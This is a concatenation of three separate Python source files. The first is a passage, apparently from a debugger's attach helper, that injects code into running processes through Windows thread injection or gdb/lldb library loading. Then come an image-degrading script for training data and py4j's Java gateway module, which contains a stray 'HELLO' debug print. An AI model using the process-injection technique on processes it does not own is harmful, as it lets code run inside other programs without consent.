# The registers RAX, RCX, RDX, R8, R9, R10, R11 are considered volatile and must be considered destroyed on function calls (unless otherwise safety-provable by analysis such as whole program optimization).
#
# The registers RBX, RBP, RDI, RSI, RSP, R12, R13, R14, and R15 are considered nonvolatile and must be saved and restored by a function that uses them.
#
# Important: RCX: first int argument
with helper.push('rdi'): # This one REALLY must be pushed/poped
with helper.push('rsp'):
with helper.push('rbp'):
with helper.push('rbx'):
with helper.push('rdi'): # Note: pop is automatic.
helper.mov_to_register_addr('rcx', helper.pack_address(code_address))
helper.mov_to_register_addr('rdx', helper.pack_address(return_code_address))
helper.mov_to_register_addr('rbx', helper.pack_address(attach_func))
helper.call('rbx')
else:
with helper.push('eax'): # Note: pop is automatic.
with helper.push('ebp'):
with helper.push('ebx'):
with helper.preserve_stack():
# Put our code as a parameter in the stack (on x86, we push parameters to
# the stack)
helper.push_addr(helper.pack_address(return_code_address))
helper.push_addr(helper.pack_address(code_address))
helper.mov_to_register_addr('ebx', helper.pack_address(attach_func))
helper.call('ebx')
helper.ret()
code = helper.get_code()
# Uncomment to see the disassembled version of what we just did...
# with open('f.asm', 'wb') as stream:
# stream.write(code)
#
# exe = r'x:\nasm\nasm-2.07-win32\nasm-2.07\ndisasm.exe'
# if is_64:
# arch = '64'
# else:
# arch = '32'
#
# subprocess.call((exe + ' -b %s f.asm' % arch).split())
debug('Injecting code to target process')
thread, _thread_address = process.inject_code(code, 0)
timeout = None # Could receive timeout in millis.
debug('Waiting for code to complete')
thread.wait(timeout)
return_code = process.read_int(return_code_address)
if return_code == 0:
print('Attach finished successfully.')
else:
print('Error when injecting code in target process. Error code: %s (on windows)' % (return_code,))
process.free(thread.pInjectedMemory)
process.free(code_address)
process.free(return_code_address)
return return_code
def run_python_code_linux(pid, python_code, connect_debugger_tracing=False, show_debug_info=0):
assert '\'' not in python_code, 'Having a single quote messes with our command.'
filedir = os.path.dirname(__file__)
# Valid arguments for arch are i386, i386:x86-64, i386:x64-32, i8086,
# i386:intel, i386:x86-64:intel, i386:x64-32:intel, i386:nacl,
# i386:x86-64:nacl, i386:x64-32:nacl, auto.
if is_python_64bit():
suffix = 'amd64'
arch = 'i386:x86-64'
else:
suffix = 'x86'
arch = 'i386'
debug('Attaching with arch: %s'% (arch,))
target_dll = os.path.join(filedir, 'attach_linux_%s.so' % suffix)
target_dll = os.path.abspath(os.path.normpath(target_dll))
if not os.path.exists(target_dll):
raise RuntimeError('Could not find dll file to inject: %s' % target_dll)
gdb_threads_settrace_file = find_helper_script(filedir, 'gdb_threads_settrace.py')
# Note: we currently don't support debug builds
is_debug = 0
# Note that the space in the beginning of each line in the multi-line is important!
cmd = [
'gdb',
'--nw', # no gui interface
'--nh', # no ~/.gdbinit
'--nx', # no .gdbinit
# '--quiet', # no version number on startup
'--pid',
str(pid),
'--batch',
# '--batch-silent',
]
cmd.extend(["--eval-command='set scheduler-locking off'"]) # If on we'll deadlock.
cmd.extend(["--eval-command='set architecture %s'" % arch])
cmd.extend([
"--eval-command='call dlopen(\"%s\", 2)'" % target_dll,
"--eval-command='call DoAttach(%s, \"%s\", %s)'" % (
is_debug, python_code, show_debug_info)
])
if connect_debugger_tracing:
cmd.extend([
"--command='%s'" % (gdb_threads_settrace_file,),
])
#print ' '.join(cmd)
env = os.environ.copy()
# Remove the PYTHONPATH (if gdb has a builtin Python it could fail if we
# have the PYTHONPATH for a different python version or some forced encoding).
env.pop('PYTHONIOENCODING', None)
env.pop('PYTHONPATH', None)
debug('Running: %s' % (' '.join(cmd)))
p = subprocess.Popen(
' '.join(cmd),
shell=True,
env=env,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
debug('Running gdb in target process.')
out, err = p.communicate()
debug('stdout: %s' % (out,))
debug('stderr: %s' % (err,))
return out, err
def find_helper_script(filedir, script_name):
lldb_threads_settrace_file = os.path.join(filedir, 'linux', script_name)
lldb_threads_settrace_file = os.path.normpath(lldb_threads_settrace_file)
if not os.path.exists(lldb_threads_settrace_file):
raise RuntimeError('Could not find file to settrace: %s' % lldb_threads_settrace_file)
return lldb_threads_settrace_file
def run_python_code_mac(pid, python_code, connect_debugger_tracing=False, show_debug_info=0):
assert '\'' not in python_code, 'Having a single quote messes with our command.'
filedir = os.path.dirname(__file__)
# Valid arguments for arch are i386, i386:x86-64, i386:x64-32, i8086,
# i386:intel, i386:x86-64:intel, i386:x64-32:intel, i386:nacl,
# i386:x86-64:nacl, i386:x64-32:nacl, auto.
if is_python_64bit():
suffix = 'x86_64.dylib'
arch = 'i386:x86-64'
else:
suffix = 'x86.dylib'
arch = 'i386'
debug('Attaching with arch: %s'% (arch,))
target_dll = os.path.join(filedir, 'attach_%s' % suffix)
target_dll = os.path.normpath(target_dll)
if not os.path.exists(target_dll):
raise RuntimeError('Could not find dll file to inject: %s' % target_dll)
lldb_threads_settrace_file = find_helper_script(filedir, 'lldb_threads_settrace.py')
lldb_prepare_file = find_helper_script(filedir, 'lldb_prepare.py')
# Note: we currently don't support debug builds
is_debug = 0
# Note that the space in the beginning of each line in the multi-line is important!
cmd = [
'lldb',
'--no-lldbinit', # Do not automatically parse any '.lldbinit' files.
# '--attach-pid',
# str(pid),
# '--arch',
# arch,
'--script-language',
'Python'
# '--batch-silent',
]
cmd.extend([
"-o 'process attach --pid %d'"%pid,
"-o 'command script import \"%s\"'" % (lldb_prepare_file,),
"-o 'load_lib_and_attach \"%s\" %s \"%s\" %s'" % (target_dll,
is_debug, python_code, show_debug_info),
])
if connect_debugger_tracing:
cmd.extend([
# "-o 'expr (int) SetSysTraceFunc(0, 0);'",
"-o 'command script import \"%s\"'" % (lldb_threads_settrace_file,),
])
cmd.extend([
"-o 'process detach'",
"-o 'script import os; os._exit(1)'",
])
#print ' '.join(cmd)
env = os.environ.copy()
# Remove the PYTHONPATH (if gdb has a builtin Python it could fail if we
# have the PYTHONPATH for a different python version or some forced encoding).
env.pop('PYTHONIOENCODING', None)
env.pop('PYTHONPATH', None)
debug('Running: %s' % (' '.join(cmd)))
p = subprocess.Popen(
' '.join(cmd),
shell=True,
env=env,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
debug('Running lldb in target process.')
out, err = p.communicate()
debug('stdout: %s' % (out,))
debug('stderr: %s' % (err,))
return out, err
if sys.platform == 'win32':
run_python_code = run_python_code_windows
elif is_mac():
run_python_code = run_python_code_mac
else:
run_python_code = run_python_code_linux
def test():
print('Running with: %s' % (sys.executable,))
code = '''
import os, time, sys
print(os.getpid())
#from threading import Thread
#Thread(target=str).start()
if __name__ == '__main__':
while True:
time.sleep(.5)
sys.stdout.write('.\\n')
sys.stdout.flush()
'''
p = subprocess.Popen([sys.executable, '-u', '-c', code])
try:
code = 'print("It worked!")\n'
# Real code will be something as:
# code = '''import sys;sys.path.append(r'X:\winappdbg-code\examples'); import imported;'''
run_python_code(p.pid, python_code=code)
time.sleep(3)
finally:
p.kill()
def main(args):
# Otherwise, assume the first parameter is the pid and anything else is code to be executed
# in the target process.
pid = int(args[0])
del args[0]
python_code = ';'.join(args)
# Note: on Linux the python code may not have a single quote char: '
run_python_code(pid, python_code)
if __name__ == '__main__':
args = sys.argv[1:]
if not args:
print('Expected pid and Python code to execute in target process.')
else:
if '--test' == args[0]:
test()
else:
main(args)
|
Crappify.py
|
import argparse #to pass location
from threading import Thread
from PIL import Image, ImageDraw, ImageFont
from pathlib import Path
import random
ap = argparse.ArgumentParser(description="Create low-res copies of our data and add random noise to it") #Argument object
ap.add_argument("-l","--location", required = True, help="Path to data-set Folder")
args = vars(ap.parse_args())
# TODO: Run On Crappy() on GPU using FastAI's Parallel
def RSzer(im, ScaleVal):
w,h = im.size
return int(w*ScaleVal),int(h*ScaleVal)
class Crappifier():
"""This class is responsible for resizing our image,adding compression artifacts and some randomly generated noise on top of that.
We Pass the High-Res Path, Low-Res Folder and a scale factor that decides by how much we reduce image size"""
def __init__(self,HresPath,LresPath,ScaleFactor):
self.HresPath = HresPath
self.LresPath = LresPath
self.ScaleFactor = ScaleFactor
def __call__(self,Fname,ShowPaths=False):
Savepath = self.LresPath/Fname.relative_to(HiPath) #We do this because there's a way to parallely call the object on multiple files in FastAI which we can save for later
ImgObj = Image.open(Fname)#open image
TSze = RSzer(ImgObj,self.ScaleFactor)
WasaImg = ImgObj.resize(TSze, resample=Image.BILINEAR).convert('RGB')
q = random.randint(50,99)
if (random.randint(1,2) == 2):
ColorVals = (random.randint(0,255),random.randint(0,255),random.randint(0,255)) #Random RGB Values
ImageDraw.Draw(WasaImg).text((random.randint(0,TSze[0]//2),random.randint(0,TSze[1]//2)), str(q), fill=ColorVals)
WasaImg.save(Savepath,quality=q)
if(ShowPaths):
print(Savepath)
Pth = Path(args["location"])
HiPath = Pth/'Hi-Res'
LoPath = Pth/'Low-Res'
def MakeCrappy(LoPath,ScleF):
Crappy = Crappifier(HiPath,LoPath,ScleF)
for pt in HiPath.glob("*.*"):
Crappy(pt, ShowPaths=True) #Comment this to stop seeing file names as it's done and uncomment the next line
# Crappy(pt)
Pths = [LoPath/'OneHalf',LoPath/'OneFourth',LoPath/'OneEighth', LoPath/'OneSixteenth']
Scale = 0.5
MakeCrappyThrdLst = []
for P in Pths:
CurThread = Thread(target=MakeCrappy,args=(P,Scale,))
MakeCrappyThrdLst.append(CurThread)
CurThread.start()
Scale = Scale/2
[Thrd.join() for Thrd in MakeCrappyThrdLst]
print("Done!!")
|
java_gateway.py
|
# -*- coding: UTF-8 -*-
"""Module to interact with objects in a Java Virtual Machine from a
Python Virtual Machine.
Variables that might clash with the JVM start with an underscore
(Java Naming Convention do not recommend to start with an underscore
so clashes become unlikely).
Created on Dec 3, 2009
:author: Barthelemy Dagenais
"""
from __future__ import unicode_literals, absolute_import
from collections import deque
import logging
import os
from pydoc import pager
import select
import socket
from subprocess import Popen, PIPE
import sys
from threading import Thread, RLock
import weakref
from py4j.compat import (
range, hasattr2, basestring, CompatThread, Queue)
from py4j.finalizer import ThreadSafeFinalizer
from py4j import protocol as proto
from py4j.protocol import (
Py4JError, Py4JNetworkError, escape_new_line, get_command_part,
get_return_value, is_error, register_output_converter, smart_decode)
from py4j.version import __version__
class NullHandler(logging.Handler):
def emit(self, record):
pass
null_handler = NullHandler()
logging.getLogger("py4j").addHandler(null_handler)
logger = logging.getLogger("py4j.java_gateway")
BUFFER_SIZE = 4096
DEFAULT_ADDRESS = "127.0.0.1"
DEFAULT_PORT = 25333
DEFAULT_PYTHON_PROXY_PORT = 25334
DEFAULT_CALLBACK_SERVER_ACCEPT_TIMEOUT = 5
PY4J_SKIP_COLLECTIONS = "PY4J_SKIP_COLLECTIONS"
PY4J_TRUE = set(["yes", "y", "t", "true"])
def deprecated(name, last_version, use_instead="", level=logging.DEBUG,
raise_exc=False):
if not use_instead:
msg = "{0} is deprecated and will be removed in version {1}"\
.format(name, last_version)
else:
msg = "{0} is deprecated and will be removed in version {1}. "\
"Use {2} instead."\
.format(name, last_version, use_instead)
logger.log(level, msg)
if raise_exc:
raise DeprecationWarning(msg)
def java_import(jvm_view, import_str):
"""Imports the package or class specified by `import_str` in the
jvm view namespace.
:param jvm_view: The jvm_view in which to import a class/package.
:import_str: The class (e.g., java.util.List) or the package
(e.g., java.io.*) to import
"""
gateway_client = jvm_view._gateway_client
command = proto.JVMVIEW_COMMAND_NAME + proto.JVM_IMPORT_SUB_COMMAND_NAME +\
jvm_view._id + "\n" + escape_new_line(import_str) + "\n" +\
proto.END_COMMAND_PART
answer = gateway_client.send_command(command)
return_value = get_return_value(answer, gateway_client, None, None)
return return_value
def find_jar_path():
"""Tries to find the path where the py4j jar is located.
"""
paths = []
jar_file = "py4j{0}.jar".format(__version__)
paths.append(jar_file)
paths.append(os.path.join(os.path.dirname(
os.path.realpath(__file__)), "../../../py4j-java/" + jar_file))
paths.append(os.path.join(os.path.dirname(
os.path.realpath(__file__)), "../share/py4j/" + jar_file))
paths.append("../../../current-release/" + jar_file)
paths.append(os.path.join(sys.prefix, "share/py4j/" + jar_file))
for path in paths:
if os.path.exists(path):
return path
return ""
def launch_gateway(port=0, jarpath="", classpath="", javaopts=[],
die_on_exit=False, redirect_stdout=None,
redirect_stderr=None, daemonize_redirect=False):
"""Launch a `Gateway` in a new Java process.
The redirect parameters accept file-like objects, Queue, or deque. When
text lines are sent to the stdout or stderr of the child JVM, these lines
are redirected to the file-like object (``write(line)``), the Queue
(``put(line)``), or the deque (``appendleft(line)``).
The text line will contain a newline character.
Only text output is accepted on stdout and stderr. If you wish to
communicate with the child JVM through bytes, you need to create your own
helper function.
:param port: the port to launch the Java Gateway on. If no port is
specified then an ephemeral port is used.
:param jarpath: the path to the Py4J jar. Only necessary if the jar
was installed at a non-standard location or if Python is using
a different `sys.prefix` than the one that Py4J was installed
under.
:param classpath: the classpath used to launch the Java Gateway.
:param javaopts: an array of extra options to pass to Java (the classpath
should be specified using the `classpath` parameter, not `javaopts`.)
:param die_on_exit: if `True`, the Java gateway process will die when
this Python process exits or is killed.
:param redirect_stdout: where to redirect the JVM stdout. If None (default)
stdout is redirected to os.devnull. Otherwise accepts a
file descriptor, a queue, or a deque. Will send one line at a time
to these objects.
:param redirect_stderr: where to redirect the JVM stdout. If None (default)
stderr is redirected to os.devnull. Otherwise accepts a
file descriptor, a queue, or a deque. Will send one line at a time to
these objects.
:param daemonize_redirect: if True, the consumer threads will be daemonized
and will not prevent the main Python process from exiting. This means
the file descriptors (stderr, stdout, redirect_stderr, redirect_stdout)
might not be properly closed. This is not usually a problem, but the
default is conservatively set to False.
:rtype: the port number of the `Gateway` server.
"""
if not jarpath:
jarpath = find_jar_path()
# Fail if the jar does not exist.
if not os.path.exists(jarpath):
raise Py4JError("Could not find py4j jar at {0}".format(jarpath))
# Launch the server in a subprocess.
classpath = os.pathsep.join((jarpath, classpath))
command = ["java", "-classpath", classpath] + javaopts + \
["py4j.GatewayServer"]
if die_on_exit:
command.append("--die-on-broken-pipe")
command.append(str(port))
logger.debug("Launching gateway with command {0}".format(command))
# stderr redirection
if redirect_stderr is None:
stderr = open(os.devnull, "w")
elif isinstance(redirect_stderr, Queue) or\
isinstance(redirect_stderr, deque):
stderr = PIPE
else:
stderr = redirect_stderr
# we don't need this anymore
redirect_stderr = None
# stdout redirection
if redirect_stdout is None:
redirect_stdout = open(os.devnull, "w")
proc = Popen(command, stdout=PIPE, stdin=PIPE, stderr=stderr,
close_fds=True)
# Determine which port the server started on (needed to support
# ephemeral ports)
_port = int(proc.stdout.readline())
# Start consumer threads so process does not deadlock/hangs
OutputConsumer(
redirect_stdout, proc.stdout, daemon=daemonize_redirect).start()
if redirect_stderr is not None:
OutputConsumer(
redirect_stderr, proc.stderr, daemon=daemonize_redirect).start()
ProcessConsumer(proc, [redirect_stdout], daemon=daemonize_redirect).start()
return _port
def get_field(java_object, field_name):
"""Retrieves the field named `field_name` from the `java_object`.
This function is useful when `auto_field=false` in a gateway or
Java object.
:param java_object: the instance containing the field
:param field_name: the name of the field to retrieve
"""
command = proto.FIELD_COMMAND_NAME + proto.FIELD_GET_SUBCOMMAND_NAME +\
java_object._target_id + "\n" + field_name + "\n" +\
proto.END_COMMAND_PART
answer = java_object._gateway_client.send_command(command)
if answer == proto.NO_MEMBER_COMMAND or is_error(answer)[0]:
raise Py4JError("no field {0} in object {1}".format(
field_name, java_object._target_id))
else:
return get_return_value(
answer, java_object._gateway_client, java_object._target_id,
field_name)
def set_field(java_object, field_name, value):
"""Sets the field named `field_name` of `java_object` to `value`.
This function is the only way to set a field because the assignment
operator in Python cannot be overloaded.
:param java_object: the instance containing the field
:param field_name: the name of the field to set
:param value: the value to assign to the field
"""
command_part = get_command_part(
value,
java_object._gateway_client.gateway_property.pool)
command = proto.FIELD_COMMAND_NAME + proto.FIELD_SET_SUBCOMMAND_NAME +\
java_object._target_id + "\n" + field_name + "\n" +\
command_part + "\n" + proto.END_COMMAND_PART
answer = java_object._gateway_client.send_command(command)
if answer == proto.NO_MEMBER_COMMAND or is_error(answer)[0]:
raise Py4JError("no field {0} in object {1}".format(
field_name, java_object._target_id))
return get_return_value(
answer, java_object._gateway_client, java_object._target_id,
field_name)
def get_method(java_object, method_name):
"""Retrieves a reference to the method of an object.
This function is useful when `auto_field=true` and an instance field has
the same name as a method. The full signature of the method is not
required: it is determined when the method is called.
:param java_object: the instance containing the method
:param method_name: the name of the method to retrieve
"""
return JavaMember(
method_name, java_object, java_object._target_id,
java_object._gateway_client)
def is_instance_of(gateway, java_object, java_class):
"""Indicates whether a java object is an instance of the provided
java_class.
:param gateway: the JavaGateway instance
:param java_object: the JavaObject instance
:param java_class: can be a string (fully qualified name), a JavaClass
instance, or a JavaObject instance)
"""
if isinstance(java_class, basestring):
param = java_class
elif isinstance(java_class, JavaClass):
param = java_class._fqn
elif isinstance(java_class, JavaObject):
param = java_class.getClass()
else:
raise Py4JError(
"java_class must be a string, a JavaClass, or a JavaObject")
return gateway.jvm.py4j.reflection.TypeUtil.isInstanceOf(
param, java_object)
def quiet_close(closable):
"""Quietly closes a closable object without throwing an exception.
:param closable: Object with a ``close`` method.
"""
try:
closable.close()
except Exception:
logger.debug("Exception while closing", exc_info=True)
def quiet_shutdown(socket_instance):
"""Quietly shuts down a socket without throwing an exception.
:param socket_instance: Socket with ``shutdown`` method.
"""
try:
socket_instance.shutdown(socket.SHUT_RDWR)
except Exception:
logger.debug("Exception while shutting down a socket", exc_info=True)
def gateway_help(gateway_client, var, pattern=None, short_name=True,
display=True):
"""Displays a help page about a class or an object.
:param gateway_client: The gatway client
:param var: JavaObject, JavaClass or JavaMember for which a help page
will be generated.
:param pattern: Star-pattern used to filter the members. For example
"get*Foo" may return getMyFoo, getFoo, getFooBar, but not bargetFoo.
The pattern is matched against the entire signature. To match only
the name of a method, use "methodName(*".
:param short_name: If True, only the simple name of the parameter
types and return types will be displayed. If False, the fully
qualified name of the types will be displayed.
:param display: If True, the help page is displayed in an interactive
page similar to the `help` command in Python. If False, the page is
returned as a string.
"""
if hasattr2(var, "_get_object_id"):
command = proto.HELP_COMMAND_NAME +\
proto.HELP_OBJECT_SUBCOMMAND_NAME +\
var._get_object_id() + "\n" +\
get_command_part(pattern) +\
get_command_part(short_name) +\
proto.END_COMMAND_PART
answer = gateway_client.send_command(command)
elif hasattr2(var, "_fqn"):
command = proto.HELP_COMMAND_NAME +\
proto.HELP_CLASS_SUBCOMMAND_NAME +\
var._fqn + "\n" +\
get_command_part(pattern) +\
get_command_part(short_name) +\
proto.END_COMMAND_PART
answer = gateway_client.send_command(command)
elif hasattr2(var, "container") and hasattr2(var, "name"):
if pattern is not None:
raise Py4JError("pattern should be None with var is a JavaMember")
pattern = var.name + "(*"
var = var.container
return gateway_help(
gateway_client, var, pattern, short_name=short_name,
display=display)
else:
raise Py4JError(
"var is none of Java Object, Java Class or Java Member")
help_page = get_return_value(answer, gateway_client, None, None)
if (display):
pager(help_page)
else:
return help_page
def _garbage_collect_object(gateway_client, target_id):
ThreadSafeFinalizer.remove_finalizer(
smart_decode(gateway_client.address) +
smart_decode(gateway_client.port) +
target_id)
if target_id != proto.ENTRY_POINT_OBJECT_ID and\
gateway_client.is_connected:
try:
gateway_client.send_command(
proto.MEMORY_COMMAND_NAME +
proto.MEMORY_DEL_SUBCOMMAND_NAME +
target_id +
"\ne\n")
except Exception:
logger.debug("Exception while garbage collecting an object",
exc_info=True)
def _garbage_collect_connection(socket_instance):
"""Closes the socket if auto_delete is True and the socket is opened.
This is an acceptable practice if you know that your Python VM implements
garbage collection and closing sockets immediately is not a concern.
Otherwise, it is always better (because it is predictable) to explicitly
close the socket by calling `GatewayConnection.close()`.
"""
if socket_instance is not None:
quiet_shutdown(socket_instance)
quiet_close(socket_instance)
class OutputConsumer(CompatThread):
"""Thread that consumes output
"""
def __init__(self, redirect, stream, *args, **kwargs):
super(OutputConsumer, self).__init__(*args, **kwargs)
self.redirect = redirect
self.stream = stream
if isinstance(redirect, Queue):
self.redirect_func = self._pipe_queue
if isinstance(redirect, deque):
self.redirect_func = self._pipe_deque
if hasattr2(redirect, "write"):
self.redirect_func = self._pipe_fd
def _pipe_queue(self, line):
self.redirect.put(line)
def _pipe_deque(self, line):
self.redirect.appendleft(line)
def _pipe_fd(self, line):
self.redirect.write(line)
def run(self):
lines_iterator = iter(self.stream.readline, b"")
for line in lines_iterator:
self.redirect_func(smart_decode(line))
class ProcessConsumer(CompatThread):
"""Thread that ensures process stdout and stderr are properly closed.
"""
def __init__(self, proc, closable_list, *args, **kwargs):
super(ProcessConsumer, self).__init__(*args, **kwargs)
self.proc = proc
if closable_list:
# We don't care if it contains queues or deques, quiet_close will
# just ignore them.
self.closable_list = closable_list
else:
self.closable_list = []
def run(self):
self.proc.wait()
quiet_close(self.proc.stdout)
quiet_close(self.proc.stderr)
for closable in self.closable_list:
quiet_close(closable)
class GatewayParameters(object):
"""Wrapper class that contains all parameters that can be passed to
configure a `JavaGateway`
"""
def __init__(
self, address=DEFAULT_ADDRESS, port=DEFAULT_PORT, auto_field=False,
auto_close=True, auto_convert=False, eager_load=False):
"""
:param address: the address to which the client will request a
connection
:param port: the port to which the client will request a connection.
Default is 25333.
:param auto_field: if `False`, each object accessed through this
gateway won"t try to lookup fields (they will be accessible only by
calling get_field). If `True`, fields will be automatically looked
up, possibly hiding methods of the same name and making method calls
less efficient.
:param auto_close: if `True`, the connections created by the client
close the socket when they are garbage collected.
:param auto_convert: if `True`, try to automatically convert Python
objects like sequences and maps to Java Objects. Default value is
`False` to improve performance and because it is still possible to
explicitly perform this conversion.
:param eager_load: if `True`, the gateway tries to connect to the JVM
by calling System.currentTimeMillis. If the gateway cannot connect to
the JVM, it shuts down itself and raises an exception.
"""
self.address = address
self.port = port
self.auto_field = auto_field
self.auto_close = auto_close
self.auto_convert = auto_convert
self.eager_load = eager_load
class CallbackServerParameters(object):
"""Wrapper class that contains all parameters that can be passed to
configure a `CallbackServer`
"""
def __init__(
self, address=DEFAULT_ADDRESS, port=DEFAULT_PYTHON_PROXY_PORT,
daemonize=False, daemonize_connections=False, eager_load=True):
"""
:param address: the address to which the client will request a
connection
:param port: the port to which the client will request a connection.
Default is 25333.
:param daemonize: If `True`, will set the daemon property of the server
thread to True. The callback server will exit automatically if all
the other threads exit.
:param daemonize_connections: If `True`, callback server connections
are executed in daemonized threads and will not block the exit of a
program if non daemonized threads are finished.
:param eager_load: If `True`, the callback server is automatically
started when the JavaGateway is created.
"""
self.address = address
self.port = port
self.daemonize = daemonize
self.daemonize_connections = daemonize_connections
self.eager_load = eager_load
class DummyRLock(object):
def __init__(self):
pass
def acquire(self, blocking=1):
pass
def release(self):
pass
def __enter__(self):
pass
def __exit__(self, type, value, tb):
pass
class GatewayClient(object):
"""Responsible for managing connections to the JavaGateway.
This implementation is thread-safe and connections are created on-demand.
This means that Py4J-Python can be accessed by multiple threads and
messages are sent to and processed concurrently by the Java Gateway.
When creating a custom :class:`JavaGateway`, it is recommended to pass an
instance of :class:`GatewayClient` instead of a :class:`GatewayConnection`:
both have the same interface, but the client supports multiple threads and
connections, which is essential when using callbacks. """
def __init__(self, address=DEFAULT_ADDRESS, port=25333, auto_close=True,
gateway_property=None):
"""
:param address: the address to which the client will request a
connection
:param port: the port to which the client will request a connection.
Default is 25333.
:param auto_close: if `True`, the connections created by the client
close the socket when they are garbage collected.
:param gateway_property: used to keep gateway preferences without a
cycle with the gateway
"""
self.address = address
self.port = port
self.is_connected = True
self.auto_close = auto_close
self.gateway_property = gateway_property
self.deque = deque()
def _get_connection(self):
if not self.is_connected:
raise Py4JNetworkError("Gateway is not connected.")
try:
connection = self.deque.pop()
except IndexError:
connection = self._create_connection()
return connection
def _create_connection(self):
connection = GatewayConnection(
self.address, self.port, self.auto_close, self.gateway_property)
connection.start()
return connection
def _give_back_connection(self, connection):
try:
self.deque.append(connection)
except Exception:
logger.warning(
"Exception while giving back connection", exc_info=True)
def shutdown_gateway(self):
"""Sends a shutdown command to the gateway. This will close the
gateway server: all active connections will be closed. This may
be useful if the lifecycle of the Java program must be tied to
the Python program.
"""
connection = self._get_connection()
try:
connection.shutdown_gateway()
self.close()
self.is_connected = False
except Py4JNetworkError:
logger.debug("Error while shutting down gateway.", exc_info=True)
self.shutdown_gateway()
def send_command(self, command, retry=True):
"""Sends a command to the JVM. This method is not intended to be
called directly by Py4J users. It is usually called by
:class:`JavaMember` instances.
:param command: the `string` command to send to the JVM. The command
must follow the Py4J protocol.
:param retry: if `True`, the GatewayClient tries to resend a message
if it fails.
:rtype: the `string` answer received from the JVM. The answer follows
the Py4J protocol.
"""
connection = self._get_connection()
try:
response = connection.send_command(command)
self._give_back_connection(connection)
except Py4JNetworkError:
if retry:
logging.info("Exception while sending command.", exc_info=True)
response = self.send_command(command)
else:
logging.exception(
"Exception while sending command.")
response = proto.ERROR
return response
def close(self):
"""Closes all currently opened connections.
This operation is not thread safe and is only a best effort strategy
to close active connections.
All connections are guaranteed to be closed only if no other thread
is accessing the client and no call is pending.
"""
size = len(self.deque)
for _ in range(0, size):
try:
connection = self.deque.pop()
quiet_close(connection)
except IndexError:
pass
class GatewayConnection(object):
"""Default gateway connection (socket based) responsible for communicating
with the Java Virtual Machine."""
def __init__(self, address=DEFAULT_ADDRESS, port=25333, auto_close=True,
gateway_property=None):
"""
:param address: the address to which the connection will be established
:param port: the port to which the connection will be established.
Default is 25333.
:param auto_close: if `True`, the connection closes the socket when it
is garbage collected.
:param gateway_property: contains gateway preferences to avoid a cycle
with gateway
"""
self.address = address
self.port = port
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.is_connected = False
self.auto_close = auto_close
self.gateway_property = gateway_property
self.wr = weakref.ref(
self,
lambda wr, socket_instance=self.socket:
_garbage_collect_connection(socket_instance))
def start(self):
"""Starts the connection by connecting to the `address` and the `port`
"""
try:
self.socket.connect((self.address, self.port))
self.is_connected = True
self.stream = self.socket.makefile("rb", 0)
except Exception as e:
msg = "An error occurred while trying to connect to the Java "\
"server"
logger.exception(msg)
raise Py4JNetworkError(msg, e)
def close(self):
"""Closes the connection by closing the socket."""
quiet_close(self.stream)
quiet_shutdown(self.socket)
quiet_close(self.socket)
self.is_connected = False
def shutdown_gateway(self):
"""Sends a shutdown command to the gateway. This will close the gateway
server: all active connections will be closed. This may be useful
if the lifecycle of the Java program must be tied to the Python
program.
"""
if (not self.is_connected):
raise Py4JError("Gateway must be connected to send shutdown cmd.")
try:
quiet_close(self.stream)
self.socket.sendall(
proto.SHUTDOWN_GATEWAY_COMMAND_NAME.encode("utf-8"))
quiet_close(self.socket)
self.is_connected = False
except Exception:
# Do nothing! Exceptions might occur anyway.
logger.debug("Exception occurred while shutting down gateway",
exc_info=True)
def send_command(self, command):
"""Sends a command to the JVM. This method is not intended to be
called directly by Py4J users: it is usually called by JavaMember
instances.
:param command: the `string` command to send to the JVM. The command
must follow the Py4J protocol.
:rtype: the `string` answer received from the JVM. The answer follows
the Py4J protocol.
"""
logger.debug("Command to send: {0}".format(command))
try:
self.socket.sendall(command.encode("utf-8"))
answer = smart_decode(self.stream.readline()[:-1])
logger.debug("Answer received: {0}".format(answer))
# Happens when a the other end is dead. There might be an empty
# answer before the socket raises an error.
if answer.strip() == "":
self.close()
raise Py4JError("Answer from Java side is empty")
return answer
except Exception as e:
logger.exception("Error while sending or receiving.")
raise Py4JNetworkError("Error while sending or receiving", e)
class JavaMember(object):
"""Represents a member (i.e., method) of a :class:`JavaObject`. For now,
only methods are supported. Fields are retrieved directly and are not
contained in a JavaMember.
"""
def __init__(self, name, container, target_id, gateway_client):
self.name = name
self.container = container
self.target_id = target_id
self.gateway_client = gateway_client
self.command_header = self.target_id + "\n" + self.name + "\n"
self.pool = self.gateway_client.gateway_property.pool
self.converters = self.gateway_client.converters
self._gateway_doc = None
@property
def __doc__(self):
# The __doc__ string is used by IPython/PyDev/etc to generate
# help string, therefore provide useful help
if self._gateway_doc is None:
self._gateway_doc = gateway_help(
self.gateway_client, self, display=False)
return self._gateway_doc
def _get_args(self, args):
temp_args = []
new_args = []
for arg in args:
if not isinstance(arg, JavaObject):
for converter in self.gateway_client.converters:
if converter.can_convert(arg):
temp_arg = converter.convert(arg, self.gateway_client)
temp_args.append(temp_arg)
new_args.append(temp_arg)
break
else:
new_args.append(arg)
else:
new_args.append(arg)
return (new_args, temp_args)
def __call__(self, *args):
if self.converters is not None and len(self.converters) > 0:
(new_args, temp_args) = self._get_args(args)
else:
new_args = args
temp_args = []
args_command = "".join(
[get_command_part(arg, self.pool) for arg in new_args])
command = proto.CALL_COMMAND_NAME +\
self.command_header +\
args_command +\
proto.END_COMMAND_PART
answer = self.gateway_client.send_command(command)
return_value = get_return_value(
answer, self.gateway_client, self.target_id, self.name)
for temp_arg in temp_args:
temp_arg._detach()
return return_value
class JavaObject(object):
"""Represents a Java object from which you can call methods or access
fields."""
def __init__(self, target_id, gateway_client):
"""
:param target_id: the identifier of the object on the JVM side. Given
by the JVM.
:param gateway_client: the gateway client used to communicate with
the JVM.
"""
self._target_id = target_id
self._gateway_client = gateway_client
self._auto_field = gateway_client.gateway_property.auto_field
self._methods = {}
self._field_names = set()
self._fully_populated = False
self._gateway_doc = None
key = smart_decode(self._gateway_client.address) +\
smart_decode(self._gateway_client.port) +\
self._target_id
value = weakref.ref(
self,
lambda wr, cc=self._gateway_client, id=self._target_id:
_garbage_collect_object(cc, id))
ThreadSafeFinalizer.add_finalizer(key, value)
def _detach(self):
_garbage_collect_object(self._gateway_client, self._target_id)
def _get_object_id(self):
return self._target_id
@property
def __doc__(self):
# The __doc__ string is used by IPython/PyDev/etc to generate
# help string, therefore provide useful help
print("HELLO")
if self._gateway_doc is None:
self._gateway_doc = gateway_help(
self._gateway_client, self, display=False)
return self._gateway_doc
